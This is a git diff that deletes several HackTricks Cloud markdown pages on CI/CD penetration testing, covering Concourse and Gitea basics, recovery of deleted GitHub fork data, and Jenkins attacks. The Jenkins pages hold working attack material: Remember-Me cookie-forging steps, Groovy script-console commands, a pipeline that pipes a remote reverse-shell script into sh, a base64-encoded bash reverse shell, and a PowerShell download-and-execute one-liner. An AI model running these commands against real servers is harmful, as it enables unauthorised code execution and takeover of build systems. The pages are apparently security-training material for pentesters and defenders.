-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
-
-### Architecture
-
-![](<../../.gitbook/assets/image (187).png>)
-
-#### ATC: web UI & build scheduler
-
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
-
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
-
-#### TSA: worker registration & forwarding
-
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
-
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
-
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
-
-#### Workers
-
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
-
-* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. 
-* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
-
-## References
-
-* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/pentesting-ci-cd/gitea-security/basic-gitea-information.md
deleted file mode 100644
index b5daaad8e..000000000
--- a/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ /dev/null
@@ -1,131 +0,0 @@
-# Basic Gitea Information
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Structure
-
-The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
-
-Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
-
-A user may also be **part of different teams** with different permissions over different repos.
-
-And finally **repositories may have special protection mechanisms**.
-
-## Permissions
-
-### Organizations
-
-When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
-
-**Org admins** (owners) can select the **visibility** of the organization:
-
-* Public
-* Limited (logged in users only)
-* Private (members only)
-
-**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
-
-When creating a new team, several important settings are selected:
-
-* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
-* It's also indicated **if members can create new repos** (creator will get admin access to it)
-* The **permissions** the **members** of the repo will **have**:
- * **Administrator** access
- * **Specific** access:
-
-![](<../../.gitbook/assets/image (118).png>)
-
-### Teams & Users
-
-In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. 
There are **3** possible **roles**:
-
-* Administrator
-* Write
-* Read
-
-## Gitea Authentication
-
-### Web Access
-
-Using **username + password** and potentially (and recommended) a 2FA.
-
-### **SSH Keys**
-
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
-
-#### **GPG Keys**
-
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
-
-### **Personal Access Tokens**
-
-You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
-
-### Oauth Applications
-
-Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
-
-![](<../../.gitbook/assets/image (194).png>)
-
-### Deploy keys
-
-Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
-
-## Branch Protections
-
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
-
-The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_
-
-{% hint style="info" %}
-It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. 
-{% endhint %}
-
-Different protections can be applied to a branch (like to master):
-
-* **Disable Push**: No-one can push to this branch
-* **Enable Push**: Anyone with access can push, but not force push.
-* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
-* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
-* **Enable Status checks:** Require status checks to pass before merging.
-* **Require approvals**: Indicate the number of approvals required before a PR can be merged.
-* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
-* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
-* **Block merge on official review requests**: If there official review requests it cannot be merged
-* **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
-* **Require Signed Commits**: Commits must be signed.
-* **Block merge if pull request is outdated**
-* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
-
-{% hint style="info" %}
-As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
-{% endhint %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
deleted file mode 100644
index 392386866..000000000
--- a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ /dev/null
@@ -1,85 +0,0 @@
-# Accessible Deleted Data in Github
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
-
-## Accessing Deleted Fork Data
-
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
-
-{% hint style="danger" %}
-The data commited in the deleted fork is still accessible.
-{% endhint %}
-
-## Accessing Deleted Repo Data
-
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
-
-{% hint style="danger" %}
-Even if you deleted your repo, all the changes made to it are still accessible through the forks.
-{% endhint %}
-
-## Accessing Private Repo Data
-
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
-3. You make your “upstream” repository public and keep your fork private.
-
-{% hint style="danger" %}
-It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. 
-{% endhint %}
-
-## How to discover commits from deleted/hidden forks
-
-The same blog post propose 2 options:
-
-### Directly accessing the commit
-
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
-
-### Brute-forcing short SHA-1 values
-
-It's the same to access both of these:
-
-* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
-* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
-
-And the latest one use a short sha-1 that is bruteforceable.
-
-## References
-
-* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
deleted file mode 100644
index 06ae83621..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ /dev/null
@@ -1,135 +0,0 @@
-# Jenkins Arbitrary File Read to RCE via "Remember Me"
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) - -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: - -### Attack Prerequisites - -* **Feature Requirement:** "Remember me" must be enabled (default setting). -* **Access Levels:** Attacker needs Overall/Read permissions. -* **Secret Access:** Ability to read both binary and textual content from key files. - -### Detailed Exploitation Process - -#### Step 1: Data Collection - -**User Information Retrieval** - -* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - * **Username** - * **User seed** - * **Timestamp** - * **Password hash** - -**Secret Key Extraction** - -* Extract cryptographic keys used for signing the cookie: - * **Secret Key:** `$JENKINS_HOME/secret.key` - * **Master Key:** `$JENKINS_HOME/secrets/master.key` - * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` - -#### Step 2: Cookie Forging - -**Token Preparation** - -* **Calculate Token Expiry Time:** - - {% code overflow="wrap" %} - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` - {% endcode %} -* **Concatenate Data for Token:** - - {% code overflow="wrap" %} - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` - {% endcode %} - -**MAC Key Decryption** - -* **Decrypt MAC Key File:** - - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not 
decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` - -**Signature Computation** - -* **Compute HMAC SHA256:** - - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` - -**Cookie Encoding** - -* **Generate Final Cookie:** - - {% code overflow="wrap" %} - ```javascript - cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature) // Base64 encode the cookie data - ``` - {% endcode %} - -#### Step 3: Code Execution - -**Session Authentication** - -* **Fetch CSRF and Session Tokens:** - * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. - -**Command Execution Request** - -* **Send a POST Request with Groovy Script:** - - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` - - * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. - -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
deleted file mode 100644
index 34044c311..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# Jenkins RCE Creating/Modifying Pipeline
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Creating a new Pipeline - -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** - -![](<../../.gitbook/assets/image (235).png>) - -In the **Pipeline section** write the **reverse shell**: - -![](<../../.gitbook/assets/image (285).png>) - -```groovy -pipeline { - agent any - - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } -} -``` - -Finally click on **Save**, and **Build Now** and the pipeline will be executed: - -![](<../../.gitbook/assets/image (228).png>) - -## Modifying a Pipeline - -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
deleted file mode 100644
index b11c7dcb3..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# Jenkins RCE Creating/Modifying Project
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Creating a Project - -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). - -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** - -![](<../../.gitbook/assets/image (165).png>) - -## Modifying a Project - -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): - -![](<../../.gitbook/assets/image (265).png>) - -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). - -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). 
-
-## Execution
-
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
-
-![](<../../.gitbook/assets/image (98).png>)
-
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
deleted file mode 100644
index 786f87325..000000000
--- a/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# Jenkins RCE with Groovy Script
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Jenkins RCE with Groovy Script - -This is less noisy than creating a new project in Jenkins - -1. Go to _path\_jenkins/script_ -2. Inside the text box introduce the script - -```python -def process = "PowerShell.exe ".execute() -println "Found text ${process.text}" -``` - -You could execute a command using: `cmd.exe /c dir` - -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = '[INSERT COMMAND]'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in linux - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - -```python -scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" -echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc -``` - -### Script - -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). 
-
-You can use MSF to get a reverse shell:
-
-```
-msf> use exploit/multi/http/jenkins_script_console
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} diff --git a/pentesting-ci-cd/todo.md b/pentesting-ci-cd/todo.md deleted file mode 100644 index 716bbecf1..000000000 --- a/pentesting-ci-cd/todo.md +++ /dev/null @@ -1,42 +0,0 @@ -# TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective - -* Drone -* TeamCity -* BuildKite -* OctopusDeploy -* Rancher -* Mesosphere -* Radicle -* Any other CI/CD platform... - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-ci-cd/travisci-security/README.md b/pentesting-ci-cd/travisci-security/README.md deleted file mode 100644 index 9d14e9703..000000000 --- a/pentesting-ci-cd/travisci-security/README.md +++ /dev/null @@ -1,92 +0,0 @@ -# TravisCI Security - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
